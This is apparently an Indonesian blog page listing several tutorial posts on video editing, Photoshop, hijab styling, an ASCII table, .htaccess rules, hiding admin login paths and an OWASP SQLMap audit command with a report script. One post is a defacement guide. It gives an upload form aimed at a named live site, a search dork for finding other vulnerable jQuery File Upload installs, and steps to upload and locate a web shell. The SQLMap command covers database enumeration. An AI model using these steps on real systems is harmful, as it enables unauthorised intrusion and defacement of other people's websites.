Showing posts with label Tutorial. Show all posts
  • Tutorial Memotong Dan Menghilangkan Subtitle Dengan FormatFactory

    Kali ini saya akan memberikan tutorial yang sangat sederhana,yang semoga saja membantu
    mungkin membantu kalian yang mau edit tapi videonya harus berformat mp4 dan kalian juga harus menghilangkan subtitlenya
    tanpa perlu kalian 2 kali kerja yaitu memformat dan menghilangkan subtitle video bisa menggunakan cara ini
    mungkin masi banyak cara yang lain, tapi tidak ada salahnya saya bagikan cara ini
    untuk yang belom mendownload/memiliki formatfactory bisa didownload DISINI
    ok langsung aja video tutorialnya diliat




    Sekian dari saya, jika ada yang ingin ditanyakan silakan ditanyakan dikomentar


  • Cara menyembunyikan directory admin login pada vbulletin dan whmcs

    Pada posting saya kali ini akan berbagi pengetahuan tentang menyembunyikan admin login vbulletin dan whmcs.

    menyembunyikan login admin vbulletin:

    1. Login pada cpanel dan cari file config.php yang berada di public_html/includes/config.php

    2. Buka file config.php dan cari baris ini

    $config['Misc']['admincpdir'] = 'admincp'; 

    kemudian ganti dengan nama yang akan anda inginkan,misalnya folder admincp akan di ganti dengan nama rahasia yaitu ganti admincp dengan rahasia script nya seperti ini

    $config['Misc']['admincpdir'] = 'rahasia';

    lalu save.

    3. Cari folder admincp yang berada di public_ht@@/admincp kemudian rename sesuai yang kita tuliskan di script config.php diatas dengan nama rahasia.

    4. Jika anda ingin merubah modcp juga langkahnya sama seperti merubah admincp.jika sudah selesai coba anda login pada directory yang telah anda edit tadi misal http://forum.planet-webhost.com/admincp

    Menyembunyikan login admin pada whmcs:

    1. Login pada cpanel dan cari file dbconnect.php kemudian buka file dbconnect.php dan cari baris

    $customadminpath = 'admin'; 

    dan di ganti dengan

    $customadminpath = 'rahasia'; 

    jika anda menginginkan folder admin berubah menjadi rahasia.lalu save.

    2. Kemudian rename folder admin menjadi rahasia yang berada di public_html/admin.jika sudah selesai coba anda login pada directory yang telah anda edit tadi misal http://planet-webhost.com/admin

    Semoga ini bermanfaat bagi anda yang belum mengetahuinya.kalau yang sudah tahu saya mohon maaf dengan tulisan saya disini.terimakasih



    Sumber
  • Deface With Exploit Jquery File Upload On Android

    Yo kali ini saya akan membagikan tutorial biasa 
    sebenarnya hanya beda sedikit metode saja 
    jika biasanya dari pc/laptop kini menggunakan android 
    yo langsung saja 
    Bahan :
    Notepad ( Bisa Cari Di PlayStore )
    Shell 
    CSRF 
     <form method="POST" action="http://www.urimalo.com/assets/js/jquery-file-upload/server/php/"
    enctype="multipart/form-data">
    <input type="file" name="files[]" /><button>Upload</button>
    </form>


    Dork :
    inurl:plugins/jquery-file-upload/server/php


     saya sediakan site vuln kalo mau coba silakan dicoba tapi kalo bisa jangan diacak acak ya kasian yang mau nyoba 
    ini tampilannya
     
    selanjutnya buka notepad lalu masukan csrfnya di notepad dan save.html
    lalu buka tempat kalian menyimpan file 
    lalu buka sesuai broswer yang kalian gunakan 
     
     lalu lanjutkan stepnya seperti biasa 


    upload shell


    lalu liat tempat directori shellnya biasanya di bla.com/blablabla/server/php/files/namashell.php
    sekian tutorial kecil dari saya 
    mungkin biasa saja atau sama saja dengan yang lain 
    tapi setidaknya tutorial ini membagikan bahwa dengan android juga mereka bisa melakukan kejailan mereka :D 
    mungkin kecil 
    tapi akan aneh jika anda bisa melakukan hal BESAR tapi tidak bisa melakukan hal KECIL 

    ./Salam SiPengembara Gila 

  • Tutorial Photoshop Text ID10T

    Tutorial Photoshop Text ID10T by SiPengembara Gila [ Mr.ApaPedulimu ]
    ok kali ini saya akan memberikan tutorial text photoshop Cs6
    saya tidak tau menamai apa karna saya hampir ga pernah liat tutorial
    jadi saya juga ga tau udah ada atau belum
    tutorial yang sangat simple ini mungkin bisa membantu para pengguna photoshop untuk sedikit berkarya , :v
    maaf kalo jelek ya ini cuplikan gambarnya


    untuk font yang ada di tutorial ini menggunakan font iceland jika anda mengiginkannya silakan download dibawah
    karna saya memiliki sedikit waktu jadi saya berikan file psdnya
    Download PSD
    Download Font Photosop

    untuk kalian yang ingin mengganti textnya, silakan liat sedikit tutorial berikut


    pada bagian text anda hanya tinggal mengganti saja dengan kata kata yang anda inginkan
    lalu anda hanya perlu mengedit pada layer 4 menggunakan brush seperti yang ada digambar mengikuti fola text yang anda buat
    ok sekian tutorial sederhana dari, jangan pernah berhenti berkarya
    saya saja yang hapir gak pernah liat tutorial dan buka photoshop kalo lagi gak ada kuota aja bisa sedikit berkarya kenapa anda tidak
    selamat mencoba :D








    Tags :
    Tutorial Photoshop Text ID10T
    Tutorial Photoshop Text
    Tutorial Photoshop Text CS 6
    Font Photoshop
    Font Iceland Photoshop
    Iceland Photoshop
  • ASCII Code - The extended ASCII table

    ASCII control characters (character code 0-31)

    The first 32 characters in the ASCII-table are unprintable control codes and are used to control peripherals such as printers.
    DEC OCT HEX BIN Symbol HTML Number HTML Name Description
    00000000000000NUL&#000; Null char
    10010100000001SOH&#001; Start of Heading
    20020200000010STX&#002; Start of Text
    30030300000011ETX&#003; End of Text
    40040400000100EOT&#004; End of Transmission
    50050500000101ENQ&#005; Enquiry
    60060600000110ACK&#006; Acknowledgment
    70070700000111BEL&#007; Bell
    80100800001000 BS&#008; Back Space
    90110900001001 HT&#009; Horizontal Tab
    100120A00001010 LF&#010; Line Feed
    110130B00001011 VT&#011; Vertical Tab
    120140C00001100 FF&#012; Form Feed
    130150D00001101 CR&#013; Carriage Return
    140160E00001110 SO&#014; Shift Out / X-On
    150170F00001111 SI&#015; Shift In / X-Off
    160201000010000DLE&#016; Data Line Escape
    170211100010001DC1&#017; Device Control 1 (oft. XON)
    180221200010010DC2&#018; Device Control 2
    190231300010011DC3&#019; Device Control 3 (oft. XOFF)
    200241400010100DC4&#020; Device Control 4
    210251500010101NAK&#021; Negative Acknowledgement
    220261600010110SYN&#022; Synchronous Idle
    230271700010111ETB&#023; End of Transmit Block
    240301800011000CAN&#024; Cancel
    250311900011001 EM&#025; End of Medium
    260321A00011010SUB&#026; Substitute
    270331B00011011ESC&#027; Escape
    280341C00011100 FS&#028; File Separator
    290351D00011101 GS&#029; Group Separator
    300361E00011110 RS&#030; Record Separator
    310371F00011111 US&#031; Unit Separator

    ASCII printable characters (character code 32-127) Codes 32-127 are common for all the different variations of the ASCII table, they are called printable characters, represent letters, digits, punctuation marks, and a few miscellaneous symbols. You will find almost every character on your keyboard. Character 127 represents the command DEL.

    DEC OCT HEX BIN Symbol HTML Number HTML Name Description
    320402000100000 &#32; Space
    330412100100001!&#33; Exclamation mark
    340422200100010"&#34;&quot;Double quotes (or speech marks)
    350432300100011#&#35; Number
    360442400100100$&#36; Dollar
    370452500100101%&#37; Procenttecken
    380462600100110&&#38;&amp;Ampersand
    390472700100111'&#39; Single quote
    400502800101000(&#40; Open parenthesis (or open bracket)
    410512900101001)&#41; Close parenthesis (or close bracket)
    420522A00101010*&#42; Asterisk
    430532B00101011+&#43; Plus
    440542C00101100,&#44; Comma
    450552D00101101-&#45; Hyphen
    460562E00101110.&#46; Period, dot or full stop
    470572F00101111/&#47; Slash or divide
    4806030001100000&#48; Zero
    4906131001100011&#49; One
    5006232001100102&#50; Two
    5106333001100113&#51; Three
    5206434001101004&#52; Four
    5306535001101015&#53; Five
    5406636001101106&#54; Six
    5506737001101117&#55; Seven
    5607038001110008&#56; Eight
    5707139001110019&#57; Nine
    580723A00111010:&#58; Colon
    590733B00111011;&#59; Semicolon
    600743C00111100<&#60;&lt;Less than (or open angled bracket)
    610753D00111101=&#61; Equals
    620763E00111110>&#62;&gt;Greater than (or close angled bracket)
    630773F00111111?&#63; Question mark
    641004001000000@&#64; At symbol
    651014101000001A&#65; Uppercase A
    661024201000010B&#66; Uppercase B
    671034301000011C&#67; Uppercase C
    681044401000100D&#68; Uppercase D
    691054501000101E&#69; Uppercase E
    701064601000110F&#70; Uppercase F
    711074701000111G&#71; Uppercase G
    721104801001000H&#72; Uppercase H
    731114901001001I&#73; Uppercase I
    741124A01001010J&#74; Uppercase J
    751134B01001011K&#75; Uppercase K
    761144C01001100L&#76; Uppercase L
    771154D01001101M&#77; Uppercase M
    781164E01001110N&#78; Uppercase N
    791174F01001111O&#79; Uppercase O
    801205001010000P&#80; Uppercase P
    811215101010001Q&#81; Uppercase Q
    821225201010010R&#82; Uppercase R
    831235301010011S&#83; Uppercase S
    841245401010100T&#84; Uppercase T
    851255501010101U&#85; Uppercase U
    861265601010110V&#86; Uppercase V
    871275701010111W&#87; Uppercase W
    881305801011000X&#88; Uppercase X
    891315901011001Y&#89; Uppercase Y
    901325A01011010Z&#90; Uppercase Z
    911335B01011011[&#91; Opening bracket
    921345C01011100\&#92; Backslash
    931355D01011101]&#93; Closing bracket
    941365E01011110^&#94; Caret - circumflex
    951375F01011111_&#95; Underscore
    961406001100000`&#96; Grave accent
    971416101100001a&#97; Lowercase a
    981426201100010b&#98; Lowercase b
    991436301100011c&#99; Lowercase c
    1001446401100100d&#100; Lowercase d
    1011456501100101e&#101; Lowercase e
    1021466601100110f&#102; Lowercase f
    1031476701100111g&#103; Lowercase g
    1041506801101000h&#104; Lowercase h
    1051516901101001i&#105; Lowercase i
    1061526A01101010j&#106; Lowercase j
    1071536B01101011k&#107; Lowercase k
    1081546C01101100l&#108; Lowercase l
    1091556D01101101m&#109; Lowercase m
    1101566E01101110n&#110; Lowercase n
    1111576F01101111o&#111; Lowercase o
    1121607001110000p&#112; Lowercase p
    1131617101110001q&#113; Lowercase q
    1141627201110010r&#114; Lowercase r
    1151637301110011s&#115; Lowercase s
    1161647401110100t&#116; Lowercase t
    1171657501110101u&#117; Lowercase u
    1181667601110110v&#118; Lowercase v
    1191677701110111w&#119; Lowercase w
    1201707801111000x&#120; Lowercase x
    1211717901111001y&#121; Lowercase y
    1221727A01111010z&#122; Lowercase z
    1231737B01111011{&#123; Opening brace
    1241747C01111100|&#124; Vertical bar
    1251757D01111101}&#125; Closing brace
    1261767E01111110~&#126; Equivalency sign - tilde
    1271777F01111111
    &#127; Delete

    The extended ASCII codes (character code 128-255)
    There are several different variations of the 8-bit ASCII table. The table below is according to ISO 8859-1, also called ISO Latin-1. Codes 129-159 contain the Microsoft� Windows Latin-1 extended characters.
    DEC OCT HEX BIN Symbol HTML Number HTML Name Description
    1282008010000000&#128;&euro;Euro sign
    1292018110000001    
    1302028210000010&#130;&sbquo;Single low-9 quotation mark
    1312038310000011Æ’&#131;&fnof;Latin small letter f with hook
    1322048410000100&#132;&bdquo;Double low-9 quotation mark
    1332058510000101&#133;&hellip;Horizontal ellipsis
    1342068610000110&#134;&dagger;Dagger
    1352078710000111&#135;&Dagger;Double dagger
    1362108810001000ˆ&#136;&circ;Modifier letter circumflex accent
    1372118910001001&#137;&permil;Per mille sign
    1382128A10001010Å &#138;&Scaron;Latin capital letter S with caron
    1392138B10001011&#139;&lsaquo;Single left-pointing angle quotation
    1402148C10001100Å’&#140;&OElig;Latin capital ligature OE
    1412158D10001101    
    1422168E10001110Ž&#142; Latin captial letter Z with caron
    1432178F10001111    
    1442209010010000    
    1452219110010001&#145;&lsquo;Left single quotation mark
    1462229210010010&#146;&rsquo;Right single quotation mark
    1472239310010011&#147;&ldquo;Left double quotation mark
    1482249410010100&#148;&rdquo;Right double quotation mark
    1492259510010101&#149;&bull;Bullet
    1502269610010110&#150;&ndash;En dash
    1512279710010111&#151;&mdash;Em dash
    1522309810011000˜&#152;&tilde;Small tilde
    1532319910011001&#153;&trade;Trade mark sign
    1542329A10011010Å¡&#154;&scaron;Latin small letter S with caron
    1552339B10011011&#155;&rsaquo; Single right-pointing angle quotation mark
    1562349C10011100Å“&#156;&oelig;Latin small ligature oe
    1572359D10011101    
    1582369E10011110ž&#158; Latin small letter z with caron
    1592379F10011111Ÿ&#159;&yuml;Latin capital letter Y with diaeresis
    160240A010100000 &#160;&nbsp;Non-breaking space
    161241A110100001&#161;&iexcl;Inverted exclamation mark
    162242A210100010&#162;&cent;Cent sign
    163243A310100011&#163;&pound;Pound sign
    164244A410100100&#164;&curren;Currency sign
    165245A510100101&#165;&yen;Yen sign
    166246A610100110&#166;&brvbar;Pipe, Broken vertical bar
    167247A710100111&#167;&sect;Section sign
    168250A810101000&#168;&uml;Spacing diaeresis - umlaut
    169251A910101001&#169;&copy;Copyright sign
    170252AA10101010&#170;&ordf;Feminine ordinal indicator
    171253AB10101011&#171;&laquo;Left double angle quotes
    172254AC10101100&#172;&not;Not sign
    173255AD10101101&#173;&shy;Soft hyphen
    174256AE10101110&#174;&reg;Registered trade mark sign
    175257AF10101111&#175;&macr;Spacing macron - overline
    176260B010110000&#176;&deg;Degree sign
    177261B110110001&#177;&plusmn;Plus-or-minus sign
    178262B210110010&#178;&sup2;Superscript two - squared
    179263B310110011&#179;&sup3;Superscript three - cubed
    180264B410110100&#180;&acute;Acute accent - spacing acute
    181265B510110101&#181;&micro;Micro sign
    182266B610110110&#182;&para;Pilcrow sign - paragraph sign
    183267B710110111&#183;&middot;Middle dot - Georgian comma
    184270B810111000&#184;&cedil;Spacing cedilla
    185271B910111001&#185;&sup1;Superscript one
    186272BA10111010&#186;&ordm;Masculine ordinal indicator
    187273BB10111011&#187;&raquo;Right double angle quotes
    188274BC10111100&#188;&frac14;Fraction one quarter
    189275BD10111101&#189;&frac12;Fraction one half
    190276BE10111110&#190;&frac34;Fraction three quarters
    191277BF10111111&#191;&iquest;Inverted question mark
    192300C011000000&#192;&Agrave;Latin capital letter A with grave
    193301C111000001&#193;&Aacute;Latin capital letter A with acute
    194302C211000010&#194;&Acirc;Latin capital letter A with circumflex
    195303C311000011&#195;&Atilde;Latin capital letter A with tilde
    196304C411000100&#196;&Auml;Latin capital letter A with diaeresis
    197305C511000101&#197;&Aring;Latin capital letter A with ring above
    198306C611000110&#198;&AElig;Latin capital letter AE
    199307C711000111&#199;&Ccedil;Latin capital letter C with cedilla
    200310C811001000&#200;&Egrave;Latin capital letter E with grave
    201311C911001001&#201;&Eacute;Latin capital letter E with acute
    202312CA11001010&#202;&Ecirc;Latin capital letter E with circumflex
    203313CB11001011&#203;&Euml;Latin capital letter E with diaeresis
    204314CC11001100&#204;&Igrave;Latin capital letter I with grave
    205315CD11001101&#205;&Iacute;Latin capital letter I with acute
    206316CE11001110&#206;&Icirc;Latin capital letter I with circumflex
    207317CF11001111&#207;&Iuml;Latin capital letter I with diaeresis
    208320D011010000&#208;&ETH;Latin capital letter ETH
    209321D111010001&#209;&Ntilde;Latin capital letter N with tilde
    210322D211010010&#210;&Ograve;Latin capital letter O with grave
    211323D311010011&#211;&Oacute;Latin capital letter O with acute
    212324D411010100&#212;&Ocirc;Latin capital letter O with circumflex
    213325D511010101&#213;&Otilde;Latin capital letter O with tilde
    214326D611010110&#214;&Ouml;Latin capital letter O with diaeresis
    215327D711010111&#215;&times;Multiplication sign
    216330D811011000&#216;&Oslash;Latin capital letter O with slash
    217331D911011001&#217;&Ugrave;Latin capital letter U with grave
    218332DA11011010&#218;&Uacute;Latin capital letter U with acute
    219333DB11011011&#219;&Ucirc;Latin capital letter U with circumflex
    220334DC11011100&#220;&Uuml;Latin capital letter U with diaeresis
    221335DD11011101&#221;&Yacute;Latin capital letter Y with acute
    222336DE11011110&#222;&THORN;Latin capital letter THORN
    223337DF11011111&#223;&szlig;Latin small letter sharp s - ess-zed
    224340E011100000&#224;&agrave;Latin small letter a with grave
    225341E111100001&#225;&aacute;Latin small letter a with acute
    226342E211100010&#226;&acirc;Latin small letter a with circumflex
    227343E311100011&#227;&atilde;Latin small letter a with tilde
    228344E411100100&#228;&auml;Latin small letter a with diaeresis
    229345E511100101&#229;&aring;Latin small letter a with ring above
    230346E611100110&#230;&aelig;Latin small letter ae
    231347E711100111&#231;&ccedil;Latin small letter c with cedilla
    232350E811101000&#232;&egrave;Latin small letter e with grave
    233351E911101001&#233;&eacute;Latin small letter e with acute
    234352EA11101010&#234;&ecirc;Latin small letter e with circumflex
    235353EB11101011&#235;&euml;Latin small letter e with diaeresis
    236354EC11101100&#236;&igrave;Latin small letter i with grave
    237355ED11101101&#237;&iacute;Latin small letter i with acute
    238356EE11101110&#238;&icirc;Latin small letter i with circumflex
    239357EF11101111&#239;&iuml;Latin small letter i with diaeresis
    240360F011110000&#240;&eth;Latin small letter eth
    241361F111110001&#241;&ntilde;Latin small letter n with tilde
    242362F211110010&#242;&ograve;Latin small letter o with grave
    243363F311110011&#243;&oacute;Latin small letter o with acute
    244364F411110100&#244;&ocirc;Latin small letter o with circumflex
    245365F511110101&#245;&otilde;Latin small letter o with tilde
    246366F611110110&#246;&ouml;Latin small letter o with diaeresis
    247367F711110111&#247;&divide;Division sign
    248370F811111000&#248;&oslash;Latin small letter o with slash
    249371F911111001&#249;&ugrave;Latin small letter u with grave
    250372FA11111010&#250;&uacute;Latin small letter u with acute
    251373FB11111011&#251;&ucirc;Latin small letter u with circumflex
    252374FC11111100&#252;&uuml;Latin small letter u with diaeresis
    253375FD11111101&#253;&yacute;Latin small letter y with acute
    254376FE11111110&#254;&thorn;Latin small letter thorn
    255377FF11111111&#255;&yuml;Latin small letter y with diaeresis



    Thank's For Sourcode : http://www.ascii-code.com/
  • Tutorial Hijab - Cara Memakai Jilbab Paris Segi Empat Untuk Sehari hari

    Mungkin saya Non Muslim tapi bukan berarti saya tidak bisa berbagi tentang ISLAM
    saya akan membagikan Tutorial Hijab - Cara Memakai Jilbab Paris Segi Empat Untuk Sehari hari
    ingat Perbedaan Agama bukanlah Penghalang untuk Berbagi, bukan untuk SALING Mengucilkan atau Menghina, Bukan pembatas , baiklah itu aja ceramahnya saya mungkin banyak dihina beberapa orang MUSLIM., tapi guru SMP saya bilang ISLAM itu Agama yang Hebat, Cuman beberapa orang Muslim yang membuat jelek ISLAM seperti menghina Agama lain taupun yg lainnya , jadi jangan salahkan Agamanya tapi Orangnya , Karna tidak ada Agama yg mengajari keburukan
    oke langsung saja

    Mengenakan hijab sehari-hari untuk moment santai seperti berkumpul dengan sahabat, keluarga dan kerabata tentunya harus tetap kamu perhatikan. Agar hijab yang kamu kenakan selalu terlihat cantik meski untuk acara-acara yang tidak formal. Dengan begitu, jika kamu selalu menjaga penampilan dengan tetap tampil menawan, orang lain yang melihatmu akan senantiasa tetap kagum dengan tampilanmu.
    Nah, untuk para hijaber, kamu mungkin kebingungan gaya hijab seperti apa yang cocok kamu kenakan untuk acara santai, dengan gaya yang cantik namun dengan cara yang sederhana agar aktifitasmu tetap merasa nyaman. Inilah dia, bisikan.com memiliki tutorial hijab terbaru yang bisa kamu kenakan untuk moment-moment santai. Adalah Tutorial Hijab - Cara Memakai Jilbab Paris Segi Empat Untuk Sehari hari yang bisa kamu gunakan, namun sebelum kita simak langkah-langkahnya, ada baiknya kamu harus tahu dulu bahan-bahan apa saja yang harus kamu persiapkan.

    Inilah Dia Bahan-Bahan yang Perlu Dipersiapkan

    • 1 buah hijab paris
    • 1 buah hijab maroko
    • Beberapa jarum pentul
    Jika bahan-bahan diatas sudah kamu persiapkan, selanjutnya barulah kamu bisa mulai menyimak langkah-langkah tutorial hijab kali ini.

    Inilah Dia Tutorial Hijab - Cara Memakai Jilbab Paris Segi Empat Untuk Sehari-Hari

    Tutorial Hijab - Cara Memakai Jilbab Paris Segi Empat Untuk Sehari hari
    1. Pertama-tama, silahkan kamu bisa terlebih dahulu mengenakan hijab maroko yang sudah kamu persiapkan. Untuk penggunaan hijab maroko, sebaiknya kamu posisikan senyaman mungkin agar hijab maroko tidak melilit erat dileher, yang membuat aktifitasmu menjadi tidak nyaman.
    2. Selanjutnya, ambil hijab paris yang sebelumnya telah kamu siapkan. Kali ini, menggunakan hijab paris lain daripada biasanya, jika biasanya kamu selalu melipatnya membentuk segitiga, namun dikesempatan kali ini, biarkan hijab paris terbuka lebar membentuk persegi sebagaimana bentuk aslinya.
    3. Kemudian tempatkan dibagian kepala, seperti biasa kamu hendak menggunakan hijab. Selanjutnya pastikan jika bagian masing-masing ujung hijab memiliki ukuran yang berbeda, dengan ujung sebelah

    kiri lebih pendek dari ujung sebelah kanan atau sebaliknya.
    4. Setelah itu, tarik ujung hijab yang lebih panjang kebagian atas kepala dan lilitkan ke kepala, tempatkan dibagian kuncir sebelah kanan, kemudian rekatkan menggunakan jarum pentul.
    5. Kemudian bagian belakang yang masih menjuntai, kita tarik dan tempatkan kedepan diatas kepala sehingga membentuk pola berlapis dan pastikan kedua ujung memiliki ukuran yang sama.
    6. Agar kedua ujung hijab ini merekat kuat , berikan masing-masing jarum pentul dimasing-masing sisi kanan dan kirinya.
    7. Agar terlihat lebih rapih, ikatkan kedua ujung hijab tadi kedalam dan tutupi dengan ujung yang menjuntai didepan. Hal ini untuk memudahkan kamu untuk tetap aktif dalam bergerak.
    Dan kini Tutorial Hijab - Cara Memakai Jilbab Paris Segi Empat Untuk Sehari-hari sudah siap. Kamu bisa mengaplikasikannya dirumah tentunya dengan metode yang begitu sederhana dan mudah.

    Thank's Source : http://bisikan.com




    Tags :
    Tutorial Hijab - Cara Memakai Jilbab Paris Segi Empat Untuk Sehari hari  
    Cara Memakai Jilbab Paris Segi Empat
    Tutorial Cara Hijab   Memakai Jilbab Paris Segi Empat
    Memakai Jilbab Paris Segi Empat
    Belajar Hijab Memakai Jilbab Paris Segi Empat

  • fungsi script .htaccess

    Berikut fungsi dari script-script .htaccess :

    Bisa Menambahkan Domain:



    <Limit GET POST PUT>
    order allow,deny
    allow from all
    deny from 192.168.1.5
    deny from .*domain\.com.*
    </Limit>

    Melindungi Serangan DDOS dengan membatasi upload File :
    LimitRequestBody 10240000

    Membatasi akses ke LAN (Local Area Network) :
    <Limit GET POST PUT>
    order deny,allow
    deny from all
    allow from 192.168.1.5
    </Limit>

    Memberikan password pada banyak file :
    <FilesMatch "^(execute|index|secure|insanity|biscuit)*$">
    AuthType basic
    AuthName "Development"
    AuthUserFile /home/path/.htpasswd
    Require valid-user
    </FilesMatch>

    Memberikan password dicrectory dimana .htaccess berada :
    resides
    AuthType basic
    AuthName "This directory is protected"
    AuthUserFile /home/path/.htpasswd
    AuthGroupFile /dev/null
    Require valid-user

    Memberikan apssword pada File :
    <Files rahasia.php>
    AuthType Basic
    AuthName "Prompt"
    AuthUserFile /home/path/.htpasswd
    Require valid-user
    </Files>

    Mencegah Akses :
    <Files .htaccess>
    order allow,deny
    deny from all
    </Files>

    Mencegah Akses ke banyak file :
    <FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
    Order Allow,Deny
    Deny from all
    </FilesMatch>

    Mencegah akses ke file tertentu :
    <files rahasia.txt>
    order allow,deny
    deny from all
    </files>

    Mencegah user melakukan browsing dan membatasi ektensi File :

    IndexIgnore *.wmv *.mp4 *.avi *.etc

    Mencegah user melakukan Browsing pada setiap direktori di server kita:
    Options All -Indexes

    Mengijinkan user melakukan Browsing pada setiap direktori server kita :
    Options All +Indexes

    Mencegah user melakukan browsing tanpa pesan error 403 :
    IndexIgnore *

    Mengamankan direktori dari pengeksekusian script atau file :
    AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
    Options -ExecCGI

    Mengubah Index file :
    DirectoryIndex penggantiindex.php

    Menyamarkan ektesi php :
    AddType application/x-httpd-php .hacking

    Otomatis memberikan CHMOD pada setiap file:
    chmod .htpasswd files 640
    chmod .htaccess files 644
    chmod php files 600
  • Automated Audit using SQLMap

    Description

    This page has the objective to show an example SQLMap command to automate the auditing of a web application for SQL injection vulnerabilities. SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. (SQLMap homepage).
    This command line does not replace a manual audit but can be useful to perform a first validation.

    Command line

    python sqlmap.py -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2 
    --keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=4 --banner --is-dba --dbs --tables --technique=BEUST 
    -s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/scan_out.txt


    Options used to specify HTTP communication behaviors:

    Options used to specify audit behaviors:

    Options used to specify scan information's' saving behaviors:

    Extract from SQLMap documentation about SQL injection techniques identified by B/E/U/S/T (http://sqlmap.sourceforge.net/doc/README.html#toc1.3):
    [B]oolean-based blind SQL injection, also known as inferential SQL injection: sqlmap replaces or appends to the affected parameter
     in the HTTP request, a syntatically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose
     the user want to retrieve the output. For each HTTP response, by making a comparison between the HTTP response headers/body with 
    the original request, the tool inference the output of the injected statement character by character. Alternatively, the user can 
    provide a string or regular expression to match on True pages. The bisection algorithm implemented in sqlmap to perform this technique 
    is able to fetch each character of the output with a maximum of seven HTTP requests. Where the output is not within the clear-text plain 
    charset, sqlmap will adapt the algorithm with bigger ranges to detect the output.
    
    [E]rror-based SQL injection: sqlmap replaces or append to the affected parameter a database-specific syntatically wrong statement and
     parses the HTTP response headers and body in search of DBMS error messages containing the injected pre-defined chain of characters and 
    the statement output within. This technique works when the web application has been configured to disclose back-end database management 
    system error messages only.
    
    [U]NION query SQL injection, also known as inband SQL injection: sqlmap appends to the affected parameter a syntatically valid SQL statement
     string starting with a UNION ALL SELECT. This techique works when the web application page passes the output of the SELECT statement within 
    a for cycle, or similar, so that each line of the query output is printed on the page content. sqlmap is also able to exploit partial 
    (single entry) UNION query SQL injection vulnerabilities which occur when the output of the statement is not cycled in a for construct 
    whereas only the first entry of the query output is displayed.
    
    [S]tacked queries SQL injection, also known as multiple statements SQL injection: sqlmap tests if the web application supports stacked queries
     then, in case it does support, it appends to the affected parameter in the HTTP request, a semi-colon (;) followed by the SQL statement to be
     executed. This technique is useful to run SQL statements other than SELECT like, for instance, data definition or data manipulation statements 
    possibly leading to file system read and write access and operating system command execution depending on the underlying back-end database
    management system and the session user privileges.
    
    [T]ime-based blind SQL injection, also known as full blind SQL injection: sqlmap replaces or appends to the affected parameter in the HTTP request,
     a syntatically valid SQL statement string containing a query which put on hold the back-end DBMS to return for a certain number of seconds. 
    For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool inference the output of
     the injected statement character by character. Like for boolean-based technique, the bisection algorithm is applied.
    

    Report

    The python script below can be used to generate a HTML report from the stdout of the command line (redirected to "/tmp/scan_out.txt" in the SQLMap command line):
    ###########################################
    # Script to generate a HTML report from a 
    # SQLMap stdout output
    #
    # Author : Dominique Righetto 
    #          dominique.righetto@owasp.org
    # Date   : March 2012
    ###########################################
    import sys
    #I/O paths, take SQLMap STDOUT file from script parameter
    stdout_file_path = sys.argv[1]
    report_file_path = stdout_file_path + ".html"
    #Open STDOUT file in read mode
    file_handle_read = open(stdout_file_path,"r")
    #Open REPORT file in write mode
    file_handle_write = open(report_file_path,"w")
    #Initialize HTML report stream
    file_handle_write.write("<html xmlns=\"http://www.w3.org/1999/xhtml\" lang=\"en\" xml:lang=\"en\">")
    file_handle_write.write("<head><link rel=\"StyleSheet\" href=\"style.css\" type=\"text/css\" media=\"screen\" /><title>SQLMap HTML Report</title></head>")
    file_handle_write.write("<body><table id=\"myStyle\">")
    file_handle_write.write("<thead><tr><th scope=\"col\">Test datetime</th><th scope=\"col\">Test description</th></tr></thead>")
    file_handle_write.write("<tbody>")
    #Flag to know is global audit is OK
    cannot_find_injectable_parameter = False
    #Read STDOUT file line by line
    for line in file_handle_read:
        if (line.strip().startswith("[")) and (line.find("[*]") == -1):
            #Check for special message indicating audit global status
            if(line.lower().find("all parameters are not injectable") > -1):
                cannot_find_injectable_parameter = True
            #Report generation
            line_part = line.strip().split(" ") 
            if (line_part[2].lower() == "testing"):
                #Extract useful informations
                execution_datatime = line_part[0]
                execution_trace = ""
                count = 2
                while(count < len(line_part)):
                    execution_trace = execution_trace + " " + line_part[count]
                    count = count + 1 
                #Write report HTML line
                file_handle_write.write("<tr><td>" + line_part[0] + "</td><td>" + execution_trace + "</td></tr>")                
    file_handle_write.write("</tbody></table>")        
    #Write global audit stauts line
    if(cannot_find_injectable_parameter):
        file_handle_write.write("<h1 class=\"success\">SQLMap cannot find injectable parameters !</h1>")
    else:
        file_handle_write.write("<h1 class=\"fail\">SQLMap can find injectable parameters !</h1>")
    #Finalize report HTML stream
    file_handle_write.write("</body></html>")
    #Close I/O stream    
    file_handle_write.close()
    file_handle_read.close()
    #Print some informations
    print "Report generated to " + report_file_path 
    
    To generate the report use the command line below:
    python SQMReportGenerator.py /tmp/scan_out.txt
    
    The report will be generated into the same location than the input file using source file name and adding ".html" extension as report name.
    The script use an external CSS file named "style.css" (located into the same location than the report) to format report.
    A CSS sample is available below:
    body
    {
     line-height: 1.6em; 
    }
    .success
    {
     font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;
     text-align: center;
     color: green;
    }
    .fail
    {
     font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;
     text-align: center;
     color: red;
    }
    #myStyle
    {
     font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;
     font-size: 12px;
     margin: 45px;
     width: 75%;
     text-align: left;
     border-collapse: collapse;
     border: 1px solid #6cf;
    }
    #myStyle th
    {
     padding: 20px;
     font-weight: normal;
     font-size: 13px;
     color: #039;
     text-transform: uppercase;
     text-align: center;
     border-right: 1px solid #0865c2;
     border-top: 1px solid #0865c2;
     border-left: 1px solid #0865c2;
     border-bottom: 1px solid #fff;
    }
    #myStyle td
    {
     padding: 10px 20px;
     color: #669;
     border-right: 1px dashed #6cf;
    }
    
    Example of generated report:
    SQLMapExampleReport.png

    Remark about scan scheduling

    The scan take a while then it's recommended to schedule is execution:
    • During the night for a daily audit case.
    • During the week-end for a weekly audit case. 
    Source : https://www.owasp.org
  • Cara Install Kali Linux Pake VMware (Full Tutorial with Image)

